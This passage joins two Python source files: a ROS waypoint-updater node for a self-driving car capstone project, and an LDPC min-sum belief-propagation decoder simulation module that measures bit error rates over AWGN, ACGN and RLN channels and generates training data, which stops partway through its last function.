1a8c865bc300146078399a484e3537db5c909707
|
/ros/src/waypoint_updater/waypoint_updater.py
|
f58463599e36297bbb91a946aee415d4f98c0067
|
[
"MIT"
] |
permissive
|
MikeBMW/CarND-Capstone-debug
|
54530fe27636d8fe5f3a66ea5d937a13a48e4e25
|
9312eb38d24fc9c377ace4a56fbb13938f9598b3
|
refs/heads/master
| 2020-03-10T08:22:50.938161
| 2018-04-12T16:54:21
| 2018-04-12T16:54:21
| 129,283,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,886
|
py
|
#!/usr/bin/env python
import rospy
from geometry_msgs.msg import PoseStamped
from styx_msgs.msg import Lane, Waypoint
from std_msgs.msg import Int32
import math
import numpy as np
from scipy.spatial import KDTree
'''
This node will publish waypoints from the car's current position to some `x` distance ahead.
As mentioned in the doc, you should ideally first implement a version which does not care
about traffic lights or obstacles.
Once you have created dbw_node, you will update this node to use the status of traffic lights too.
Please note that our simulator also provides the exact location of traffic lights and their
current status in `/vehicle/traffic_lights` message. You can use this message to build this node
as well as to verify your TL classifier.
'''
LOOKAHEAD_WPS = 200 # Number of waypoints we will publish. You can change this number
MAX_DECEL = .5
class WaypointUpdater(object):
def __init__(self):
rospy.init_node('waypoint_updater')
# reserve waypoint
self.base_lane = None
# get from traffic_waypoint
self.stopline_wp_idx = -1
# contains a list of (x,y) tuples for all waypoints
self.waypoints_2d = None
# KD tree of the x,y waypoints to increase lookup time
self.waypoint_tree = None
# stores the raw pose message
self.pose_msg = None
rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)
rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)
rospy.Subscriber('/traffic_waypoint', Int32, self.traffic_cb)
self.final_waypoints_pub = rospy.Publisher('final_waypoints', Lane, queue_size=1)
self.publisher_loop(50)
def publisher_loop(self, frequency):
"""
Task: This method is called from the constructor and is responsible for calling the
publishers and their helpers repeatedly.
arguments:
-frequency: int, the frequency with which to call the publishers
returns: Nothing
"""
rate = rospy.Rate(frequency)
while not rospy.is_shutdown():
if self.pose_msg and self.base_lane:
self.publish_waypoints()
rate.sleep()
def pose_cb(self, msg):
"""
Task: Processes the messages which contain the current
position of the vehicle in map coordinates
arguments:
- msg: message type geometry_msgs/PoseStamped
returns: Nothing
ROS integration
===
Type: Callback
Topic: /current_pose
msg_type: geometry_msgs/PoseStamped
std_msgs/Header header
uint32 seq
time stamp
string frame_id
geometry_msgs/Pose pose
geometry_msgs/Point position
float64 x
float64 y
float64 z
geometry_msgs/Quaternion orientation
float64 x
float64 y
float64 z
float64 w
"""
self.pose_msg = msg
def waypoints_cb(self, waypoint_msg):
"""
Task: Processes the waypoints message which contains all of the track's waypoints in map coordinates.
Needs only to run once, because the waypoints are sent only once at the beginning.
arguments:
- waypoints: message type styx_msgs/Lane
returns: Nothing
ROS integration:
===
Type: Callback
Topic: /base_waypoints
msg_type: styx_msgs/Lane
std_msgs/Header header
uint32 seq
time stamp
string frame_id
styx_msgs/Waypoint[] waypoints
geometry_msgs/PoseStamped pose
std_msgs/Header header
uint32 seq
time stamp
string frame_id
geometry_msgs/Pose pose
geometry_msgs/Point position
float64 x
float64 y
float64 z
geometry_msgs/Quaternion orientation
float64 x
float64 y
float64 z
float64 w
geometry_msgs/TwistStamped twist
std_msgs/Header header
uint32 seq
time stamp
string frame_id
geometry_msgs/Twist twist
geometry_msgs/Vector3 linear
float64 x
float64 y
float64 z
geometry_msgs/Vector3 angular
float64 x
float64 y
float64 z
"""
self.base_lane = waypoint_msg
if not self.waypoints_2d:
self.waypoints_2d = [[waypoint.pose.pose.position.x, waypoint.pose.pose.position.y] for waypoint in waypoint_msg.waypoints]
self.waypoint_tree = KDTree(self.waypoints_2d)
def publish_waypoints(self):
"""
Task: Invokes the waypoint publisher and publishes the nearest waypoints to the
/final_waypoints topic.
arguments:
- closest_idx: int, the idx of the nearest waypoints in front of the car.
ROS integration:
===
Type: Publisher
Topic: /final_waypoints
msg_type: styx_msgs/Lane
std_msgs/Header header
uint32 seq
time stamp
string frame_id
styx_msgs/Waypoint[] waypoints
geometry_msgs/PoseStamped pose
std_msgs/Header header
uint32 seq
time stamp
string frame_id
geometry_msgs/Pose pose
geometry_msgs/Point position
float64 x
float64 y
float64 z
geometry_msgs/Quaternion orientation
float64 x
float64 y
float64 z
float64 w
geometry_msgs/TwistStamped twist
std_msgs/Header header
uint32 seq
time stamp
string frame_id
geometry_msgs/Twist twist
geometry_msgs/Vector3 linear
float64 x
float64 y
float64 z
geometry_msgs/Vector3 angular
float64 x
float64 y
float64 z
"""
final_lane = self.generate_lane()
self.final_waypoints_pub.publish(final_lane)
def generate_lane(self):
lane = Lane()
closest_idx = self.get_nearest_waypoint_idx()
farthest_idx = closest_idx + LOOKAHEAD_WPS
base_waypoints = self.base_lane.waypoints[closest_idx:farthest_idx]
# don't care about it, leave it alone
if self.stopline_wp_idx == -1 or (self.stopline_wp_idx >= farthest_idx):
lane.waypoints = base_waypoints
# brake action
else:
lane.waypoints = self.decelerate_waypoints(base_waypoints, closest_idx)
return lane
def decelerate_waypoints(self, waypoints, closest_idx):
# don't modify base waypoint directly, so use temp[]
temp = []
for i, wp in enumerate(waypoints):
p = Waypoint()
p.pose = wp.pose
# find the center of the car ,so use "-2"
stop_idx = max(self.stopline_wp_idx - closest_idx - 2, 0)
# figure out how far away to decelerate
dist = self.distance(waypoints, i, stop_idx)
# velocity falling down profile when brake, the larger distance the smaller brake
vel = math.sqrt(2 * MAX_DECEL * dist)
if vel <1.:
vel = 0.
p.twist.twist.linear.x = min(vel, wp.twist.twist.linear.x)
temp.append(p)
return temp
def get_nearest_waypoint_idx(self):
"""
Task: Finds the nearest waypoint according to the car's current position
and returns the index of that waypoint
returns: int, index of nearest waypoint in self.waypoints_2d
"""
x = self.pose_msg.pose.position.x
y = self.pose_msg.pose.position.y
# lookup the KDtree to find the nearest point and return its index
closest_idx = self.waypoint_tree.query([x, y], 1)[1]
closest_coord = np.array(self.waypoints_2d[closest_idx])
prev_coord = np.array(self.waypoints_2d[closest_idx - 1])
current_pos = np.array([x, y])
wp_vec = closest_coord - prev_coord
car_vec = closest_coord - current_pos
# calculate dot product between the two vectors
# to determine if closest point is ahead of car
# -> same heading if dot product is > 0
dot_product = np.dot(wp_vec, car_vec)
# if the closest point is not ahead of the vehicle, choose the next point
if dot_product < 0:
closest_idx = (closest_idx + 1) % len(self.waypoints_2d)
return closest_idx
def traffic_cb(self, msg):
self.stopline_wp_idx = msg.data
def obstacle_cb(self, msg):
# TODO: Callback for /obstacle_waypoint message. We will implement it later
pass
def get_waypoint_velocity(self, waypoint):
return waypoint.twist.twist.linear.x
def set_waypoint_velocity(self, waypoints, waypoint, velocity):
waypoints[waypoint].twist.twist.linear.x = velocity
def distance(self, waypoints, wp1, wp2):
dist = 0
dl = lambda a, b: math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2 + (a.z-b.z)**2)
for i in range(wp1, wp2+1):
dist += dl(waypoints[wp1].pose.pose.position, waypoints[i].pose.pose.position)
wp1 = i
return dist
if __name__ == '__main__':
try:
WaypointUpdater()
except rospy.ROSInterruptException:
rospy.logerr('Could not start waypoint updater node.')
|
[
"niyingxiang@126.com"
] |
niyingxiang@126.com
|
f4416aaaa435141bea8864fab5f4166587c55d93
|
97f741400c3fbc0cd184c78ed34b172c0f61110d
|
/Function/Simulation.py
|
59ece9a9eb6fc58e5d43c4f60a970c5239c7fad1
|
[] |
no_license
|
Leo-Chu/NOLD
|
61f5b80cd769071e51273866d50f87ac1d7a505b
|
bafc65a709d024d5ff14460f36f77d2a21632c12
|
refs/heads/master
| 2021-07-23T14:37:26.257245
| 2021-04-14T14:54:38
| 2021-04-14T14:54:38
| 247,094,657
| 10
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 33,258
|
py
|
import numpy as np
import datetime
import tensorflow as tf
import Function.Modulation as Modulation
import Function.Transmission as Transmission
import Function.DataIO as DataIO
import Function.BP_MS_Decoder as BP_MS_Decoder
def LDPC_BP_MS_AWGN_test(code, dec_config, simutimes_range, target_err_bits_num, batch_size):
## load configurations from dec_config
N = dec_config.N_code
K = dec_config.K_code
H_matrix = code.H_matrix
SNR_set = dec_config.SNR_set
BP_iter_num = dec_config.BP_iter_nums
alpha = dec_config.alpha
beta = dec_config.beta
function = 'LDPC_BP_MS_AWGN_test'
# build BP decoding network
bp_decoder = BP_MS_Decoder.BP_NetDecoder(H_matrix, batch_size, alpha, beta)
# init gragh
init = tf.global_variables_initializer()
sess = tf.Session()
print('Open a tf session!')
sess.run(init)
## initialize simulation times
max_simutimes = simutimes_range[1]
min_simutimes = simutimes_range[0]
max_batches, residual_times = np.array(divmod(max_simutimes, batch_size), np.int32)
if residual_times!=0:
max_batches += 1
## generate out ber file
bp_str = np.array2string(BP_iter_num, separator='_', formatter={'int': lambda d: "%d" % d})
bp_str = bp_str[1:(len(bp_str) - 1)]
ber_file = format('%sBER(%d_%d)_BP(%s)' % (dec_config.results_folder, N, K, bp_str))
ber_file = format('%s_%s' % (ber_file, function))
ber_file = format('%s.txt' % ber_file)
fout_ber = open(ber_file, 'wt')
## simulation starts
start = datetime.datetime.now()
for SNR in SNR_set:
y_recieve_file = format('%s_%.1f.dat' % (dec_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (dec_config.decoding_x_file, SNR))
dataio_decode = DataIO.BPdecDataIO(y_recieve_file, x_transmit_file, dec_config)
real_batch_size = batch_size
# simulation part
actual_simutimes = 0
bit_errs_iter = np.zeros(1, dtype=np.int32)
for ik in range(0, max_batches):
print('Batch %d in total %d batches.' % (ik, int(max_batches)), end=' ')
if ik == max_batches - 1 and residual_times != 0:
real_batch_size = residual_times
#encode and transmisssion
y_receive, x_bits = dataio_decode.load_next_batch(batch_size, ik)
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
ch_noise = y_receive - s_mod
LLR = y_receive
##practical noise
noise_power = np.mean(np.square(ch_noise))
practical_snr = 10*np.log10(1 / (noise_power * 2.0))
print('Practical EbN0: %.2f' % practical_snr)
#BP decoder
u_BP_decoded = bp_decoder.decode(LLR.astype(np.float32), BP_iter_num[0])
#BER
output_x = code.dec_src_bits(u_BP_decoded)
bit_errs_iter[0] += np.sum(output_x != x_bits)
actual_simutimes += real_batch_size
if bit_errs_iter[0] >= target_err_bits_num and actual_simutimes >= min_simutimes:
break
print('%d bits are simulated!' % (actual_simutimes * K))
# load to files
ber_iter = np.zeros(1, dtype=np.float64)
fout_ber.write(str(SNR) + '\t')
ber_iter[0] = bit_errs_iter[0] / float(K * actual_simutimes)
fout_ber.write(str(ber_iter[0]))
fout_ber.write('\n')
#simulation finished
fout_ber.close()
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
sess.close()
print('Close the tf session!')
def LDPC_BP_MS_ACGN_test(code, dec_config, simutimes_range, target_err_bits_num, batch_size):
## load configurations from dec_config
N = dec_config.N_code
K = dec_config.K_code
H_matrix = code.H_matrix
SNR_set = dec_config.SNR_set
BP_iter_num = dec_config.BP_iter_nums
alpha = dec_config.alpha
beta = dec_config.beta
function = 'LDPC_BP_MS_ACGN_test'
# build BP decoding network
bp_decoder = BP_MS_Decoder.BP_NetDecoder(H_matrix, batch_size, alpha, beta)
# init gragh
init = tf.global_variables_initializer()
sess = tf.Session()
print('Open a tf session!')
sess.run(init)
## initialize simulation times
max_simutimes = simutimes_range[1]
min_simutimes = simutimes_range[0]
max_batches, residual_times = np.array(divmod(max_simutimes, batch_size), np.int32)
if residual_times!=0:
max_batches += 1
## generate out ber file
bp_str = np.array2string(BP_iter_num, separator='_', formatter={'int': lambda d: "%d" % d})
bp_str = bp_str[1:(len(bp_str) - 1)]
ber_file = format('%sBER(%d_%d)_BP(%s)' % (dec_config.results_folder, N, K, bp_str))
ber_file = format('%s_%s' % (ber_file, function))
ber_file = format('%s.txt' % ber_file)
fout_ber = open(ber_file, 'wt')
## simulation starts
start = datetime.datetime.now()
for SNR in SNR_set:
y_recieve_file = format('%s_%.1f.dat' % (dec_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (dec_config.decoding_x_file, SNR))
dataio_decode = DataIO.BPdecDataIO(y_recieve_file, x_transmit_file, dec_config)
real_batch_size = batch_size
# simulation part
actual_simutimes = 0
bit_errs_iter = np.zeros(1, dtype=np.int32)
for ik in range(0, max_batches):
print('Batch %d in total %d batches.' % (ik, int(max_batches)), end=' ')
if ik == max_batches - 1 and residual_times != 0:
real_batch_size = residual_times
#encode and transmisssion
y_receive, x_bits = dataio_decode.load_next_batch(batch_size, ik)
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
ch_noise = y_receive - s_mod
LLR = y_receive
##practical noise
noise_power = np.mean(np.square(ch_noise))
practical_snr = 10*np.log10(1 / (noise_power * 2.0))
print('Practical EbN0: %.2f' % practical_snr)
#BP decoder
u_BP_decoded = bp_decoder.decode(LLR.astype(np.float32), BP_iter_num[0])
#BER
output_x = code.dec_src_bits(u_BP_decoded)
bit_errs_iter[0] += np.sum(output_x != x_bits)
actual_simutimes += real_batch_size
if bit_errs_iter[0] >= target_err_bits_num and actual_simutimes >= min_simutimes:
break
print('%d bits are simulated!' % (actual_simutimes * K))
# load to files
ber_iter = np.zeros(1, dtype=np.float64)
fout_ber.write(str(SNR) + '\t')
ber_iter[0] = bit_errs_iter[0] / float(K * actual_simutimes)
fout_ber.write(str(ber_iter[0]))
fout_ber.write('\n')
#simulation finished
fout_ber.close()
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
sess.close()
print('Close the tf session!')
def LDPC_BP_MS_RLN_test(code, dec_config, simutimes_range, target_err_bits_num, batch_size):
## load configurations from dec_config
N = dec_config.N_code
K = dec_config.K_code
H_matrix = code.H_matrix
SNR_set = dec_config.SNR_set
BP_iter_num = dec_config.BP_iter_nums
alpha = dec_config.alpha
beta = dec_config.beta
function = 'LDPC_BP_MS_RLN_test'
# build BP decoding network
bp_decoder = BP_MS_Decoder.BP_NetDecoder(H_matrix, batch_size, alpha, beta)
# init gragh
init = tf.global_variables_initializer()
sess = tf.Session()
print('Open a tf session!')
sess.run(init)
## initialize simulation times
max_simutimes = simutimes_range[1]
min_simutimes = simutimes_range[0]
max_batches, residual_times = np.array(divmod(max_simutimes, batch_size), np.int32)
if residual_times!=0:
max_batches += 1
## generate out ber file
bp_str = np.array2string(BP_iter_num, separator='_', formatter={'int': lambda d: "%d" % d})
bp_str = bp_str[1:(len(bp_str) - 1)]
ber_file = format('%sBER(%d_%d)_BP(%s)' % (dec_config.results_folder, N, K, bp_str))
ber_file = format('%s_%s' % (ber_file, function))
ber_file = format('%s.txt' % ber_file)
fout_ber = open(ber_file, 'wt')
## simulation starts
start = datetime.datetime.now()
for SNR in SNR_set:
y_recieve_file = format('%s_%.1f.dat' % (dec_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (dec_config.decoding_x_file, SNR))
r_factor_file = format('%s_%.1f.dat' % (dec_config.decoding_r_file, SNR))
factorio_decode = DataIO.FactorDataIO(r_factor_file, dec_config)
dataio_decode = DataIO.BPdecDataIO(y_recieve_file, x_transmit_file, dec_config)
real_batch_size = batch_size
# simulation part
actual_simutimes = 0
bit_errs_iter = np.zeros(1, dtype=np.int32)
for ik in range(0, max_batches):
print('Batch %d in total %d batches.' % (ik, int(max_batches)), end=' ')
if ik == max_batches - 1 and residual_times != 0:
real_batch_size = residual_times
#encode and transmisssion
y_receive, x_bits = dataio_decode.load_next_batch(batch_size, ik)
r_factor = factorio_decode.load_next_batch(batch_size, ik)
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
ch_noise = y_receive - np.multiply(s_mod, r_factor)
LLR = y_receive
##practical noise
noise_power = np.mean(np.square(ch_noise))
practical_snr = 10*np.log10(1 / (noise_power * 2.0))
print('Practical EbN0: %.2f' % practical_snr)
#BP decoder
u_BP_decoded = bp_decoder.decode(LLR.astype(np.float32), BP_iter_num[0])
#BER
output_x = code.dec_src_bits(u_BP_decoded)
bit_errs_iter[0] += np.sum(output_x != x_bits)
actual_simutimes += real_batch_size
if bit_errs_iter[0] >= target_err_bits_num and actual_simutimes >= min_simutimes:
break
print('%d bits are simulated!' % (actual_simutimes * K))
# load to files
ber_iter = np.zeros(1, dtype=np.float64)
fout_ber.write(str(SNR) + '\t')
ber_iter[0] = bit_errs_iter[0] / float(K * actual_simutimes)
fout_ber.write(str(ber_iter[0]))
fout_ber.write('\n')
#simulation finished
fout_ber.close()
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
sess.close()
print('Close the tf session!')
def LDPC_BP_QMS_AWGN_test(code, dec_config, simutimes_range, target_err_bits_num, batch_size, bp_decoder):
# load configurations from dec_config
N = dec_config.N_code
K = dec_config.K_code
SNR_set = dec_config.SNR_set
BP_iter_num = dec_config.BP_iter_nums
para_file = dec_config.para_file
function = 'LDPC_BP_QMS_AWGN_test'
# init gragh
init = tf.global_variables_initializer()
sess = tf.Session()
print('Open a tf session!')
sess.run(init)
# initialize simulation times
max_simutimes = simutimes_range[1]
min_simutimes = simutimes_range[0]
max_batches, residual_times = np.array(divmod(max_simutimes, batch_size), np.int32)
if residual_times!=0:
max_batches += 1
## generate out ber file
bp_str = np.array2string(BP_iter_num, separator='_', formatter={'int': lambda d: "%d" % d})
bp_str = bp_str[1:(len(bp_str) - 1)]
ber_file = format('%sBER(%d_%d)_BP(%s)' % (dec_config.results_folder, N, K, bp_str))
ber_file = format('%s_%s' % (ber_file, function))
ber_file = format('%s.txt' % ber_file)
fout_ber = open(ber_file, 'wt')
## simulation starts
start = datetime.datetime.now()
for SNR in SNR_set:
para_data_file = format('%sPARA(%d_%d)_SNR%.1f_Iter%d.txt' % (para_file, N, K, SNR, BP_iter_num))
para = np.loadtxt(para_data_file, np.float32)
alpha = para[0,:]
beta = para[1,:]
y_recieve_file = format('%s_%.1f.dat' % (dec_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (dec_config.decoding_x_file, SNR))
dataio_decode = DataIO.BPdecDataIO(y_recieve_file, x_transmit_file, dec_config)
real_batch_size = batch_size
# simulation part
actual_simutimes = 0
bit_errs_iter = np.zeros(1, dtype=np.int32)
for ik in range(0, max_batches):
print('Batch %d in total %d batches.' % (ik, int(max_batches)), end=' ')
if ik == max_batches - 1 and residual_times != 0:
real_batch_size = residual_times
#encode and transmisssion
y_receive, x_bits = dataio_decode.load_next_batch(batch_size, ik)
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
ch_noise = y_receive - s_mod
LLR = y_receive
##practical noise
noise_power = np.mean(np.square(ch_noise))
practical_snr = 10*np.log10(1 / (noise_power * 2.0))
print('Practical EbN0: %.2f' % practical_snr)
#BP decoder
u_BP_decoded = bp_decoder.quantized_decode(LLR.astype(np.float32), BP_iter_num[0], alpha, beta)
#BER
output_x = code.dec_src_bits(u_BP_decoded)
bit_errs_iter[0] += np.sum(output_x != x_bits)
actual_simutimes += real_batch_size
if bit_errs_iter[0] >= target_err_bits_num and actual_simutimes >= min_simutimes:
break
print('%d bits are simulated!' % (actual_simutimes * K))
# load to files
ber_iter = np.zeros(1, dtype=np.float64)
#ber
fout_ber.write(str(SNR) + '\t')
ber_iter[0] = bit_errs_iter[0] / float(K * actual_simutimes)
fout_ber.write(str(ber_iter[0]))
fout_ber.write('\n')
#simulation finished
fout_ber.close()
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
sess.close()
print('Close the tf session!')
def LDPC_BP_QMS_ACGN_test(code, dec_config, simutimes_range, target_err_bits_num, batch_size, bp_decoder):
# load configurations from dec_config
N = dec_config.N_code
K = dec_config.K_code
SNR_set = dec_config.SNR_set
BP_iter_num = dec_config.BP_iter_nums
para_file = dec_config.para_file
function = 'LDPC_BP_QMS_ACGN_test'
# init gragh
init = tf.global_variables_initializer()
sess = tf.Session()
print('Open a tf session!')
sess.run(init)
# initialize simulation times
max_simutimes = simutimes_range[1]
min_simutimes = simutimes_range[0]
max_batches, residual_times = np.array(divmod(max_simutimes, batch_size), np.int32)
if residual_times!=0:
max_batches += 1
## generate out ber file
bp_str = np.array2string(BP_iter_num, separator='_', formatter={'int': lambda d: "%d" % d})
bp_str = bp_str[1:(len(bp_str) - 1)]
ber_file = format('%sBER(%d_%d)_BP(%s)' % (dec_config.results_folder, N, K, bp_str))
ber_file = format('%s_%s' % (ber_file, function))
ber_file = format('%s.txt' % ber_file)
fout_ber = open(ber_file, 'wt')
## simulation starts
start = datetime.datetime.now()
for SNR in SNR_set:
para_data_file = format('%s/PARA(%d_%d)_SNR%.1f_Iter%d.txt' % (para_file, N, K, SNR, BP_iter_num))
para = np.loadtxt(para_data_file, np.float32)
alpha = para[0,:]
beta = para[1,:]
y_recieve_file = format('%s_%.1f.dat' % (dec_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (dec_config.decoding_x_file, SNR))
dataio_decode = DataIO.BPdecDataIO(y_recieve_file, x_transmit_file, dec_config)
real_batch_size = batch_size
# simulation part
actual_simutimes = 0
bit_errs_iter = np.zeros(1, dtype=np.int32)
for ik in range(0, max_batches):
print('Batch %d in total %d batches.' % (ik, int(max_batches)), end=' ')
if ik == max_batches - 1 and residual_times != 0:
real_batch_size = residual_times
#encode and transmisssion
y_receive, x_bits = dataio_decode.load_next_batch(batch_size, ik)
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
ch_noise = y_receive - s_mod
LLR = y_receive
##practical noise
noise_power = np.mean(np.square(ch_noise))
practical_snr = 10*np.log10(1 / (noise_power * 2.0))
print('Practical EbN0: %.2f' % practical_snr)
#BP decoder
u_BP_decoded = bp_decoder.quantized_decode(LLR.astype(np.float32), BP_iter_num[0], alpha, beta)
#BER
output_x = code.dec_src_bits(u_BP_decoded)
bit_errs_iter[0] += np.sum(output_x != x_bits)
actual_simutimes += real_batch_size
if bit_errs_iter[0] >= target_err_bits_num and actual_simutimes >= min_simutimes:
break
print('%d bits are simulated!' % (actual_simutimes * K))
# load to files
ber_iter = np.zeros(1, dtype=np.float64)
#ber
fout_ber.write(str(SNR) + '\t')
ber_iter[0] = bit_errs_iter[0] / float(K * actual_simutimes)
fout_ber.write(str(ber_iter[0]))
fout_ber.write('\n')
#simulation finished
fout_ber.close()
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
sess.close()
print('Close the tf session!')
def LDPC_BP_QMS_RLN_test(code, dec_config, simutimes_range, target_err_bits_num, batch_size, bp_decoder):
# load configurations from dec_config
N = dec_config.N_code
K = dec_config.K_code
SNR_set = dec_config.SNR_set
BP_iter_num = dec_config.BP_iter_nums
para_file = dec_config.para_file
function = 'LDPC_BP_QMS_RLN_test'
# init gragh
init = tf.global_variables_initializer()
sess = tf.Session()
print('Open a tf session!')
sess.run(init)
# initialize simulation times
max_simutimes = simutimes_range[1]
min_simutimes = simutimes_range[0]
max_batches, residual_times = np.array(divmod(max_simutimes, batch_size), np.int32)
if residual_times!=0:
max_batches += 1
## generate out ber file
bp_str = np.array2string(BP_iter_num, separator='_', formatter={'int': lambda d: "%d" % d})
bp_str = bp_str[1:(len(bp_str) - 1)]
ber_file = format('%sBER(%d_%d)_BP(%s)' % (dec_config.results_folder, N, K, bp_str))
ber_file = format('%s_%s' % (ber_file, function))
ber_file = format('%s.txt' % ber_file)
fout_ber = open(ber_file, 'wt')
## simulation starts
start = datetime.datetime.now()
for SNR in SNR_set:
para_data_file = format('%s/PARA(%d_%d)_SNR%.1f_Iter%d.txt' % (para_file, N, K, SNR, BP_iter_num))
para = np.loadtxt(para_data_file, np.float32)
alpha = para[0,:]
beta = para[1,:]
y_recieve_file = format('%s_%.1f.dat' % (dec_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (dec_config.decoding_x_file, SNR))
r_factor_file = format('%s_%.1f.dat' % (dec_config.decoding_r_file, SNR))
factorio_decode = DataIO.FactorDataIO(r_factor_file, dec_config)
dataio_decode = DataIO.BPdecDataIO(y_recieve_file, x_transmit_file, dec_config)
real_batch_size = batch_size
# simulation part
actual_simutimes = 0
bit_errs_iter = np.zeros(1, dtype=np.int32)
for ik in range(0, max_batches):
print('Batch %d in total %d batches.' % (ik, int(max_batches)), end=' ')
if ik == max_batches - 1 and residual_times != 0:
real_batch_size = residual_times
#encode and transmisssion
y_receive, x_bits = dataio_decode.load_next_batch(batch_size, ik)
r_factor = factorio_decode.load_next_batch(batch_size, ik)
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
ch_noise = y_receive - np.multiply(s_mod, r_factor)
LLR = y_receive
##practical noise
noise_power = np.mean(np.square(ch_noise))
practical_snr = 10*np.log10(1 / (noise_power * 2.0))
print('Practical EbN0: %.2f' % practical_snr)
#BP decoder
u_BP_decoded = bp_decoder.quantized_decode(LLR.astype(np.float32), BP_iter_num[0], alpha, beta)
#BER
output_x = code.dec_src_bits(u_BP_decoded)
bit_errs_iter[0] += np.sum(output_x != x_bits)
actual_simutimes += real_batch_size
if bit_errs_iter[0] >= target_err_bits_num and actual_simutimes >= min_simutimes:
break
print('%d bits are simulated!' % (actual_simutimes * K))
# load to files
ber_iter = np.zeros(1, dtype=np.float64)
#ber
fout_ber.write(str(SNR) + '\t')
ber_iter[0] = bit_errs_iter[0] / float(K * actual_simutimes)
fout_ber.write(str(ber_iter[0]))
fout_ber.write('\n')
#simulation finished
fout_ber.close()
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
sess.close()
print('Close the tf session!')
# Generate LDPC information data
def softsign(x_in):
x_temp = x_in/(np.abs(x_in) + 0.0001)
y_out = np.divide(1-x_temp, 2)
return y_out
def sigmoid(x_in):
y_out = 1/(1+np.exp(-x_in))
return y_out
def Generate_AWGN_Training_Data(code, channel, train_config, generate_data_for):
#initialized
SNR_set = train_config.SNR_set
if generate_data_for == 'Training':
total_batches = int(train_config.training_sample_num // train_config.training_minibatch_size)
batch_size = train_config.training_minibatch_size
elif generate_data_for == 'Test':
total_batches = int(train_config.test_sample_num // train_config.test_minibatch_size)
batch_size = train_config.test_minibatch_size
else:
print('Invalid objective of data generation!')
exit(0)
## Data generating starts
start = datetime.datetime.now()
for SNR in SNR_set:
if generate_data_for == 'Training':
fout_feature = open(format('%s_%.1f.dat' % (train_config.training_feature_file, SNR)), 'wb')
fout_label = open(format('%s_%.1f.dat' % (train_config.training_label_file, SNR)), 'wb')
elif generate_data_for == 'Test':
fout_feature = open(format('%s_%.1f.dat' % (train_config.test_feature_file, SNR)), 'wb')
fout_label = open(format('%s_%.1f.dat' % (train_config.test_label_file, SNR)), 'wb')
for ik in range(0, total_batches):
x_bits, u_coded_bits, s_mod, ch_noise, y_receive = Transmission.AWGN_transmission(SNR, batch_size, train_config, code, channel)
y_receive = y_receive.astype(np.float32)
y_receive.tofile(fout_feature) # write features to file
x_bits = x_bits.astype(np.float32)
x_bits.tofile(fout_label)
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
def Generate_ACGN_Training_Data(code, channel, train_config, generate_data_for):
#initialized
SNR_set = train_config.SNR_set
if generate_data_for == 'Training':
total_batches = int(train_config.training_sample_num // train_config.training_minibatch_size)
batch_size = train_config.training_minibatch_size
elif generate_data_for == 'Test':
total_batches = int(train_config.test_sample_num // train_config.test_minibatch_size)
batch_size = train_config.test_minibatch_size
else:
print('Invalid objective of data generation!')
exit(0)
## Data generating starts
start = datetime.datetime.now()
for SNR in SNR_set:
if generate_data_for == 'Training':
fout_feature = open(format('%s_%.1f.dat' % (train_config.training_feature_file, SNR)), 'wb')
fout_label = open(format('%s_%.1f.dat' % (train_config.training_label_file, SNR)), 'wb')
elif generate_data_for == 'Test':
fout_feature = open(format('%s_%.1f.dat' % (train_config.test_feature_file, SNR)), 'wb')
fout_label = open(format('%s_%.1f.dat' % (train_config.test_label_file, SNR)), 'wb')
for ik in range(0, total_batches):
x_bits, u_coded_bits, s_mod, ch_noise, y_receive = Transmission.ACGN_transmission(SNR, batch_size, train_config, code, channel)
y_receive = y_receive.astype(np.float32)
y_receive.tofile(fout_feature) # write features to file
x_bits = x_bits.astype(np.float32)
x_bits.tofile(fout_label)
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
def Generate_RLN_Training_Data(code, channel, train_config, generate_data_for):
#initialized
SNR_set = train_config.SNR_set
if generate_data_for == 'Training':
total_batches = int(train_config.training_sample_num // train_config.training_minibatch_size)
batch_size = train_config.training_minibatch_size
elif generate_data_for == 'Test':
total_batches = int(train_config.test_sample_num // train_config.test_minibatch_size)
batch_size = train_config.test_minibatch_size
else:
print('Invalid objective of data generation!')
exit(0)
## Data generating starts
start = datetime.datetime.now()
for SNR in SNR_set:
if generate_data_for == 'Training':
fout_feature = open(format('%s_%.1f.dat' % (train_config.training_feature_file, SNR)), 'wb')
fout_label = open(format('%s_%.1f.dat' % (train_config.training_label_file, SNR)), 'wb')
fout_factor = open(format('%s_%.1f.dat' % (train_config.training_factor_file, SNR)), 'wb')
elif generate_data_for == 'Test':
fout_feature = open(format('%s_%.1f.dat' % (train_config.test_feature_file, SNR)), 'wb')
fout_label = open(format('%s_%.1f.dat' % (train_config.test_label_file, SNR)), 'wb')
fout_factor = open(format('%s_%.1f.dat' % (train_config.test_factor_file, SNR)), 'wb')
for ik in range(0, total_batches):
